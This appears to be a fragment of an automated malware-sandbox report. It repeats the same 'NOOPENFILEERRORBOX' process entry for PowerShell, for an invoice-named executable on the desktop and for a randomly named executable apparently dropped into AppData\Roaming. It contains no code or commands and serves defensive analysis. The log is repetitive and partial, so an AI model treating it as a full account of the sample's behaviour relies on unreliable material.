Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
